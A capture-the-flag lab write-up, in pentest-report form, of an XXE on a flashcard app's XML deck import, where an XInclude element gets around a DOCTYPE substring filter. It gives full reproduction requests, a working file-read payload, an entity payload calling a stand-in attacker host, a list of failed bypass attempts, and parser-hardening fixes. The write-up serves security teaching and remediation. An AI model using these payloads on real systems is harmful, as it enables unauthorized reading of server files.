BugForge — 2026.05.13

Tanuki: XXE via XInclude (DOCTYPE Filter Bypass)

BugForge XML External Entity easy

Part 1: Pentest Report

Executive Summary

Tanuki is a spaced-repetition flashcard study application (React SPA + Express JSON API) hosted on the BugForge lab platform. Users register, study seeded decks, and import custom decks via a file upload that accepts JSON or XML. The XML import path routes uploaded bodies into a libxml2-based parser; a substring filter ahead of the parser blocks the literal bytes <!DOCTYPE, closing the canonical entity-based XXE path.

Testing confirmed one finding:

ID | Title | Severity | CVSS | CWE | Endpoint
F1 | XML External Entity (XXE) via XInclude on deck import | High | 6.5 | CWE-611, CWE-184 | POST /api/decks/import

The XInclude specification does not require any DOCTYPE token, so the substring filter has nothing to match. An <xi:include> element placed inside a card’s <front> field is resolved by the parser, the file content is persisted as the card’s text, and a subsequent GET /api/study/:deckId/cards returns it verbatim. The flag was read from /app/flag.txt.


Objective

Single objective: read the flag from the lab container. Any account is acceptable; no specific identity is required.


Scope / Initial Access

# Target Application
URL: https://lab-1778630791839-gvmes8.labs-app.bugforge.io

# Auth details
Registration: open, unauthenticated, no email verification.
POST /api/register issues a JWT (HS256) with payload {id, username, iat}.
Role is not encoded in the token; it is read server-side on each request.
Test account: id=4 username=haxor
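
The claim that the token carries no role can be checked by decoding its payload segment. The snippet below is a minimal sketch, not the tooling used during the engagement: the sample token is assembled locally, and its iat value and signature are placeholders, not data from the lab.

```javascript
// Decode the payload segment of a JWT without verifying the signature.
// Suitable for inspecting claims during recon only, never for authorization.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) {
    throw new Error('Expected a three-part JWT');
  }
  // JWT segments are base64url-encoded JSON.
  return JSON.parse(Buffer.from(parts[1], 'base64url').toString('utf8'));
}

// Hypothetical token built for illustration (iat and signature are invented).
const b64url = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const sampleToken = [
  b64url({ alg: 'HS256', typ: 'JWT' }),
  b64url({ id: 4, username: 'haxor', iat: 1700000000 }),
  'signature-placeholder',
].join('.');

const claims = decodeJwtPayload(sampleToken);
console.log(claims);
console.log('role' in claims); // false: the token has no role claim
```

Because the role never appears in the token, forging or editing claims cannot by itself grant admin access; the server-side lookup is what decides.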

The application sends an X-Powered-By: Express header on every response and uses snake_case JSON keys (card_count, cards_studied). CORS is wide open (Access-Control-Allow-Origin: *).


Reconnaissance: Frontend Advertised an XML Parse Path the Walkthrough Skipped

  1. The compiled React bundle (main.2a8c2eb1.js, md5 486d073089df9e3216ceed5c49dff009) was byte-identical to a prior tanuki engagement. The frontend code is therefore unchanged; the backend may or may not be.
  2. The deck import file picker declares accept=".json,.xml". The operator walkthrough only exercised the JSON path; the XML path was wired but never tested.
  3. The JWT carries {id, username, iat} only. The /api/verify-token response includes a role field read from the database, and the frontend gates the /admin link on user.role === "admin".
  4. The seeded user table holds at least three accounts created before the test account (id=4), implying id=1 is likely the administrator.
  5. /api/admin/users[/:id], /api/admin/decks[/:id], and /api/admin/cards[/:id] are referenced from the bundle as full CRUD surfaces.

The XML import surface (observation 2) was the primary motivator for the XXE hypothesis.


Application Architecture

Component | Detail
Backend | Node.js Express (x-powered-by: Express on every response)
Frontend | React SPA + Material-UI, single bundle ~516 KB
Auth | JWT HS256, payload {id, username, iat}; role read from DB on each request
XML parser | libxml2-backed (Node binding such as libxmljs or libxmljs2); XInclude enabled; XML_PARSE_NONET set (network blocked); XML_PARSE_DTDLOAD evidently off (DTD loading not observed)
CORS | Access-Control-Allow-Origin: * everywhere

API Surface

Endpoint | Method | Auth | Notes
/api/register | POST | No | Public registration; returns JWT
/api/login | POST | No | Username + password
/api/verify-token | GET | Yes | Returns {user: {id, username, email, full_name, role}}
/api/decks | GET | Yes | Lists seeded decks (id 1, 2, 3)
/api/decks/:id | GET | Yes | Single deck details
/api/decks/import | POST | Yes | Multipart upload; declared formats .json and .xml
/api/study/:deckId/cards | GET | Yes | Cards for a deck, including front / back fields
/api/study/progress | POST | Yes | SM-2 review submission
/api/study/session | POST | Yes | Records a study session
/api/admin/users[/:id] | GET / POST / PUT / DELETE | Yes (admin) | Server returns 403 {"error":"Admin access required"} for non-admin

Known Users

Username | ID | Role
(unknown, presumed admin) | 1 | admin (inferred from FE role-gated link and admin-middleware existence)
(unknown) | 2 | unknown
(unknown) | 3 | unknown
haxor | 4 | user

Attack Chain Visualization

┌───────────────────────┐   ┌────────────────────────┐   ┌──────────────────────┐   ┌────────────────────────┐
│ POST /api/decks/      │   │ POST /api/decks/import │   │ Parser resolves      │   │ GET /api/study/:id/    │
│ import with <!DOCTYPE │ ▶ │ with xmlns:xi +        │ ▶ │ file:///app/flag.txt │ ▶ │ cards returns flag in  │
│ → 400 (filter blocks) │   │ <xi:include> in card   │   │ and persists it as   │   │ the card's front field │
│                       │   │ front → 200 imported   │   │ card.front           │   │                        │
└───────────────────────┘   └────────────────────────┘   └──────────────────────┘   └────────────────────────┘

Findings

F1: XML External Entity (XXE) via XInclude on deck import

Severity: High
CVSS v3.1: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-184 (Incomplete List of Disallowed Inputs)
Endpoint: POST /api/decks/import
Authentication required: Yes (any registered account; registration is open and unrestricted)
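
The 6.5 base score can be reproduced from the vector. The sketch below applies the CVSS v3.1 base-score equations with the metric weights from the specification; it is a worked check of the arithmetic, not a general-purpose calculator. Note that the v3.1 qualitative scale places 6.5 in the Medium band (4.0 to 6.9), so the High label presumably reflects the reporter's own judgment of impact, not the CVSS band.

```javascript
// CVSS v3.1 base score for CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N.
// Metric weights are taken from the CVSS v3.1 specification.
const weights = {
  AV: 0.85, // Attack Vector: Network
  AC: 0.77, // Attack Complexity: Low
  PR: 0.62, // Privileges Required: Low (scope unchanged)
  UI: 0.85, // User Interaction: None
  C: 0.56,  // Confidentiality: High
  I: 0,     // Integrity: None
  A: 0,     // Availability: None
};

// Roundup as defined in the v3.1 specification: the smallest value with one
// decimal place that is >= the input, computed on integers to avoid float drift.
function roundup(value) {
  const scaled = Math.round(value * 100000);
  return scaled % 10000 === 0
    ? scaled / 100000
    : (Math.floor(scaled / 10000) + 1) / 10;
}

const iss = 1 - (1 - weights.C) * (1 - weights.I) * (1 - weights.A);
const impact = 6.42 * iss; // formula for Scope: Unchanged
const exploitability = 8.22 * weights.AV * weights.AC * weights.PR * weights.UI;
const baseScore = impact <= 0 ? 0 : roundup(Math.min(impact + exploitability, 10));

console.log(baseScore); // 6.5
```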

Description

The XML deck import endpoint is gated by a case-sensitive UTF-8 substring filter on the literal bytes <!DOCTYPE before the body reaches the parser. The filter blocks canonical entity-based XXE payloads (any body containing <!DOCTYPE returns 400 {"error":"Invalid file format or content"}).

XInclude does not require any DOCTYPE token. An XML body containing only the namespace declaration xmlns:xi="http://www.w3.org/2001/XInclude" and an <xi:include parse="text" href="file:///path"/> element passes the filter, is parsed by libxml2 with XInclude enabled, and the include is resolved during parse. The resolved file content is then assigned to whichever element contained the <xi:include> and is persisted as part of the imported deck. Reading the deck back via GET /api/study/:deckId/cards returns the file content verbatim in the card’s front field.

Two defects compound here:

  1. The pre-parse filter is a substring blocklist on a single token (<!DOCTYPE). It does not reject XInclude payloads or any other non-DTD XML feature that can resolve external resources.
  2. The XML parser is configured with XInclude resolution enabled and file:// resolution allowed. Only network resolution is blocked (XML_PARSE_NONET set), which prevents out-of-band (OOB) exfiltration but does not prevent local file reads.
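
The first defect can be illustrated without a parser at all. The sketch below assumes the filter is equivalent to a case-sensitive substring check (the server code was not observed; passesDoctypeFilter is a hypothetical stand-in that mirrors the black-box behaviour) and shows which bodies would reach the parser.

```javascript
// Assumed shape of the pre-parse check: a case-sensitive substring match.
function passesDoctypeFilter(body) {
  return !body.includes('<!DOCTYPE');
}

const entityPayload =
  '<?xml version="1.0"?>\n' +
  '<!DOCTYPE deck [<!ENTITY x SYSTEM "file:///app/flag.txt">]>\n' +
  '<deck><name>&x;</name></deck>';

const xincludePayload =
  '<?xml version="1.0"?>\n' +
  '<deck xmlns:xi="http://www.w3.org/2001/XInclude">\n' +
  '  <name><xi:include parse="text" href="file:///app/flag.txt"/></name>\n' +
  '</deck>';

console.log(passesDoctypeFilter(entityPayload));     // false: rejected before parsing
console.log(passesDoctypeFilter(xincludePayload));   // true: reaches the parser
console.log(passesDoctypeFilter('<!doctype deck>')); // true: the match is case-sensitive
```

The XInclude body never contains the blocked token, so no variation of the filter's casing or whitespace handling would change the outcome; only parser configuration does.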

Impact

Arbitrary file read on the application container, scoped to whatever Unix user the Node process runs as.

Reproduction

Step 1: Confirm the DOCTYPE filter rejects canonical XXE

POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY oob SYSTEM "http://attacker/p1">]>
<deck><name>&oob;</name></deck>
------b--

Response: 400 {"error":"Invalid file format or content"}. The same body without the <!DOCTYPE line parses successfully.

Step 2: Send an XInclude-based payload pointing to /app/flag.txt

POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<deck xmlns:xi="http://www.w3.org/2001/XInclude">
  <name>x</name>
  <description>d</description>
  <category>p</category>
  <cards>
    <card>
      <front><xi:include parse="text" href="file:///app/flag.txt"/></front>
      <back>b</back>
    </card>
  </cards>
</deck>
------b--

Response: 200 {"id":N,"message":"Deck imported successfully","cards_count":1}. The numeric id is the new deck identifier.
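
For scripted replay, the multipart body from Steps 1 and 2 can be assembled as a string. This is a minimal sketch: buildImportBody is a hypothetical helper, and BASE_URL and JWT in the commented-out request are placeholders. The boundary and field name match the raw requests above.

```javascript
// Build the multipart/form-data body used in Steps 1 and 2.
// Multipart bodies use CRLF line endings, and each delimiter line is
// "--" followed by the boundary declared in the Content-Type header.
function buildImportBody(xml, boundary = '----b', filename = 'x.xml') {
  return [
    `--${boundary}`,
    `Content-Disposition: form-data; name="file"; filename="${filename}"`,
    'Content-Type: application/xml',
    '',
    xml,
    `--${boundary}--`,
    '',
  ].join('\r\n');
}

const body = buildImportBody('<deck/>');
console.log(body.split('\r\n')[0]); // ------b

// Sending it (not executed here; BASE_URL and JWT are placeholders):
// await fetch(`${BASE_URL}/api/decks/import`, {
//   method: 'POST',
//   headers: {
//     Authorization: `Bearer ${JWT}`,
//     'Content-Type': 'multipart/form-data; boundary=----b',
//   },
//   body,
// });
```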

Step 3: Read the resolved content back via the study endpoint

GET /api/study/N/cards HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>

Response (abridged):

[
  {
    "id": M,
    "front": "bug{uA8e4RWc9adWFnqaHR6ULX3az5j287ap}",
    "back": "b",
    "difficulty": 0.5,
    "repetitions": 0
  }
]

The card’s front field contains the file content. Substitute any readable file path in the href to read other files within the parser’s scope.
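
Iterating over candidate paths amounts to regenerating the Step 2 document with a different href each time. The sketch below shows one way to do that; xincludeDeck and escapeXmlAttr are hypothetical helpers, and the second path in the list is an illustrative guess, not a file confirmed during testing.

```javascript
// Escape characters that are significant inside a double-quoted XML attribute.
function escapeXmlAttr(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/"/g, '&quot;');
}

// Produce a deck document whose single card front includes the given
// absolute file path as text, using the element layout from Step 2.
function xincludeDeck(filePath) {
  // encodeURI percent-encodes spaces and other characters not allowed in a URI.
  const href = escapeXmlAttr(`file://${encodeURI(filePath)}`);
  return [
    '<?xml version="1.0"?>',
    '<deck xmlns:xi="http://www.w3.org/2001/XInclude">',
    '  <name>x</name>',
    '  <description>d</description>',
    '  <category>p</category>',
    '  <cards>',
    '    <card>',
    `      <front><xi:include parse="text" href="${href}"/></front>`,
    '      <back>b</back>',
    '    </card>',
    '  </cards>',
    '</deck>',
  ].join('\n');
}

// /app/flag.txt comes from the report; /etc/hostname is only an example.
const candidates = ['/app/flag.txt', '/etc/hostname'];
const payloads = candidates.map((p) => ({ path: p, xml: xincludeDeck(p) }));
console.log(payloads[0].xml);
```

Each generated document would then be uploaded as in Step 2 and read back as in Step 3.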

Remediation

Fix 1: Disable XInclude in the parser

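// BEFORE (Vulnerable), libxmljs2-style options
// Option names below follow the report; confirm them against the binding in use.
const libxml = require('libxmljs2');

const parsed = libxml.parseXml(body, {
  noent: false,   // entities are not substituted
  nonet: true,    // network access is blocked
  xinclude: true  // XInclude processing is on: this is the defect
});

// AFTER (Secure)
const parsed = libxml.parseXml(body, {
  noent: false,
  nonet: true,
  xinclude: false, // leave xi:include elements unresolved
  dtdload: false,  // do not load external DTD subsets
  doctype: false
});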

Fix 2: If XInclude must be supported, restrict scheme and path resolution

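// BEFORE (Vulnerable), XInclude resolves any file:// URI
const parsed = libxml.parseXml(body, { xinclude: true });

// AFTER (Secure), replace the resource loader with an allowlist
// NOTE: resourceLoader, ALLOWED_INCLUDES, and readWhitelistedResource are
// illustrative names, not a confirmed libxmljs2 API. Check whether the
// binding in use exposes an equivalent loader hook before relying on this.
const parsed = libxml.parseXml(body, {
  xinclude: true,
  resourceLoader: (uri) => {
    if (!ALLOWED_INCLUDES.has(uri)) {
      throw new Error('XInclude target not permitted');
    }
    return readWhitelistedResource(uri);
  }
});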
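
Whatever hook enforces the allowlist, the check itself must normalize the URI before comparing it. The sketch below is one possible check, assuming includes are only ever needed from a single directory; ALLOWED_INCLUDE_DIR and isAllowedInclude are hypothetical names, and symlinks inside that directory are not handled here.

```javascript
// Hypothetical directory from which includes are permitted; the trailing slash matters.
const ALLOWED_INCLUDE_DIR = '/app/includes/';

// Return true only for file: URIs that resolve inside ALLOWED_INCLUDE_DIR.
// The WHATWG URL parser collapses "." and ".." path segments before the
// prefix check runs, so traversal sequences cannot escape the directory.
function isAllowedInclude(uri) {
  let url;
  try {
    url = new URL(uri);
  } catch {
    return false; // relative or malformed URIs are rejected outright
  }
  if (url.protocol !== 'file:' || url.host !== '') {
    return false;
  }
  // Reject any remaining percent-escapes instead of guessing how the
  // underlying XML parser would decode them (for example %2f).
  if (url.pathname.includes('%')) {
    return false;
  }
  return url.pathname.startsWith(ALLOWED_INCLUDE_DIR);
}

console.log(isAllowedInclude('file:///app/includes/header.xml'));  // true
console.log(isAllowedInclude('file:///app/flag.txt'));             // false
console.log(isAllowedInclude('file:///app/includes/../flag.txt')); // false
console.log(isAllowedInclude('http://attacker/p1'));               // false
```

A directory prefix is used in place of an exact-match set so that the normalization step is visible; an exact-match set of known URIs, as in the snippet above, is stricter and preferable when the include targets are fixed.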

Fix 3: Replace the substring blocklist with parser-level hardening

// BEFORE (Vulnerable), pre-parse string check
if (body.includes('<!DOCTYPE')) {
  return res.status(400).json({ error: 'Invalid file format or content' });
}
const parsed = libxml.parseXml(body);

// AFTER (Secure), drop the string blocklist and configure the parser
const parsed = libxml.parseXml(body, {
  noblanks: true,
  noent: false,
  nonet: true,
  xinclude: false,
  dtdload: false,
  dtdvalid: false,
  doctype: false
});

Additional recommendations:

  • Stop using string blocklists as the primary defense against XXE. They are bypassable through encoding, case, whitespace, and class-of-attack pivots (XInclude here).
  • Treat XML deserialization as a sensitive operation; gate parser configuration centrally rather than per-handler.
  • For deck import specifically, prefer JSON-only on the wire; if XML support is a product requirement, convert the parsed XML to a constrained intermediate object and validate it (e.g. against a JSON Schema) before persistence.
  • Restrict the application’s filesystem view at the container layer (read-only root filesystem, separate volume for flag/secret material, file ACLs that deny the Node user access to /app/flag.txt and .env-style files).
  • Apply consistent input validation across all upload-accepting endpoints, not just the one most recently scrutinized.
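
The constrained-intermediate recommendation can be sketched as a shape check applied to the plain object produced from either import format. The limits and the validateDeck helper below are hypothetical, and a JSON Schema validator would serve the same purpose. This complements parser hardening and does not replace it: a resolved include is still an ordinary string and would pass a shape check.

```javascript
// Hypothetical limits; tune them to the product's real constraints.
const MAX_CARDS = 500;
const MAX_FIELD_LENGTH = 1000;

function isBoundedString(value) {
  return typeof value === 'string' && value.length > 0 && value.length <= MAX_FIELD_LENGTH;
}

// Validate a plain-object deck (already converted from JSON or XML).
// Returns a list of problems; an empty list means the deck is acceptable.
function validateDeck(deck) {
  if (deck === null || typeof deck !== 'object') {
    return ['deck must be an object'];
  }
  const problems = [];
  if (!isBoundedString(deck.name)) {
    problems.push('name must be a non-empty bounded string');
  }
  if (!Array.isArray(deck.cards) || deck.cards.length === 0 || deck.cards.length > MAX_CARDS) {
    problems.push('cards must be a non-empty array within the size limit');
    return problems;
  }
  deck.cards.forEach((card, i) => {
    if (card === null || typeof card !== 'object') {
      problems.push(`cards[${i}] must be an object`);
      return;
    }
    if (!isBoundedString(card.front)) problems.push(`cards[${i}].front must be a bounded string`);
    if (!isBoundedString(card.back)) problems.push(`cards[${i}].back must be a bounded string`);
  });
  return problems;
}

console.log(validateDeck({ name: 'x', cards: [{ front: 'a', back: 'b' }] })); // []
console.log(validateDeck({ name: 'x', cards: [{ front: {}, back: 'b' }] }));
```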

OWASP Top 10 Coverage

  • A05:2021, Security Misconfiguration: XML parser is configured with XInclude enabled by default. The protective measure (XML_PARSE_NONET) addresses the network resolution case but the local file resolution case was left enabled.
  • A03:2021, Injection: XInclude is an XML-feature injection: an attacker-controlled element is interpreted as a parser directive rather than as data.

Tools Used

Tool | Purpose
Caido | HTTP proxy and request editor for replaying and modifying requests captured from the operator walkthrough
curl | Manual multipart payload construction for the XInclude probes (--data-binary + heredoc)
Bash | Wrapping multipart boundary construction and iterating through candidate file paths


Part 2: Notes / Knowledge

Key Learnings

  • XInclude bypasses <!DOCTYPE substring filters on XML uploads. When DOCTYPE is the only filter, XInclude is the open door. Probe shape: <root xmlns:xi="http://www.w3.org/2001/XInclude"><elem><xi:include parse="text" href="file:///path"/></elem></root>, substituting the app’s schema for <root>/<elem> so the resolved text lands in a reflected field. The same technique applies to libxml2 bindings (Node libxmljs, libxmljs2), Python lxml, and Java parsers built on JAXP, wherever XInclude processing is enabled.

Failed Approaches

Approach | Result | Why It Failed
Canonical DOCTYPE-bearing XXE (<!DOCTYPE deck [<!ENTITY oob SYSTEM "...">]>) | 400 Invalid file format or content | Substring filter on <!DOCTYPE blocks the body before it reaches the parser
Bare DOCTYPE (<!DOCTYPE deck> with no entities) | 400 same response | Filter matches the literal <!DOCTYPE token regardless of what follows
Internal entity declaration without SYSTEM/PUBLIC | 400 same response | Filter does not distinguish entity types; rejects any <!DOCTYPE body
Parameter entity (<!ENTITY % p "v">) | 400 same response | Same filter; classification of entity semantics is irrelevant
Lowercase doctype (<!doctype ...>) | 200, deck imported with cards_count: 0 | Filter is case-sensitive so the body passes, but the resulting XML is invalid and the parser falls through to a stub path that imports an empty deck
Extra-whitespace doctype (<! DOCTYPE ...>) | 200, cards_count: 0 | Same as above; bypasses the filter but produces invalid XML
UTF-16 LE with BOM | 400 or 200 stub | Parser does not respect UTF-16 charset on the multipart part
Content-Type: text/xml instead of application/xml | 400 | Filter is content-type independent
Filename .json with XML content | 400 | Filter inspects body, not filename
XInclude with parse="text" href="http://..." | 200, card front: "[object Object]" | XML_PARSE_NONET blocks network resolution; the include fails and the parser emits a stub value
Frontend-only admin gate hypothesis (direct GET /api/admin/users with non-admin JWT) | 403 Admin access required | Server-side middleware enforces role; the frontend gate is not the only check
Mass assignment of role: "admin" on registration | 200, but verify-token returns role: "user" | Registration handler whitelists known fields; extra keys are silently dropped
JWT alg: "none" against /api/verify-token | 403 Invalid token | Server pins acceptable algorithms; unsigned tokens are rejected before role check

#xxe #xinclude #file-upload #libxml2 #bugforge #webapp #cwe-611 #owasp-a05